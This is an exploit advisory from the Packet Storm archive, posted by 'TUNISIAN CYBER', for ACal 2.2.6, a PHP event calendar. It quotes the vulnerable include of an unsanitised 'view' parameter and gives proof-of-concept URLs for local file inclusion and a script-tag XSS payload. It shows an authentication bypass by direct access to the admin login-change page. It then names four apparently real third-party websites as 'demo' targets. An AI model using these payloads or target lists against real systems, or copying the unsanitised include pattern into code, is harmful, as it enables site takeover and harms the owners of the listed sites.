ACal 2.2.6 LFI / XSS / Authentication Bypass

2013-12-30T00:00:00
ID PACKETSTORM:124623
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2013-12-30T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Acal LFI/XSS/Auth Bypass Vulnerabilities  
[+] Category: WebApp  
[+] Google Dork: Use your mind  
[+] Tested on: KaliLinux  
[+] Vendor: http://acalproj.sourceforge.net/  
  
  
########################################################################################  
  
+Description:  
A web based event calendar that does not require a database server.   
It is made to be easy to install and to be able to run on just about any typical ISP's server with PHP installed.  
+Exploit:  
  
Acal Suffers from an LFI,XSS and Auth Bypass vulnerabilities:  
  
1/LFI:  
  
File(s): example.php : Lines 24--30  
Parameter:view  
  
[PHP]  
// DO NOT EDIT  
if (!isset($_GET['view'])) {  
include $path . 'embed/' . $view . '.php';  
}  
else {  
include $path . 'embed/' . $_GET['view'] . '.php';  
}  
[PHP]  
  
P.O.C:  
127.0.0.1/calendar/embed/example/example.php?view=[LFI]  
  
2/ XSS:  
127.0.0.1/calendar/calendar.php?year=<script>alert(111)</script>  
http://s13.postimg.org/u9bvlrg1i/www.jpg  
  
3/Auth Bypass:  
You can access directly to the admin panel and you can change login details:  
127.0.0.1/calendar/admin/changelogin.php  
  
Demo:  
http://www.benifeade.com/i/calendar/admin/changelogin.php  
http://www.diprove.unimi.it/calendar/admin/edit.php  
http://tavernadeglieroi.altervista.org/calendar/admin/edit.php  
http://www.davidcarrjr.com/CAL/calendar/admin/changelogin.php  
  
./3nD  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`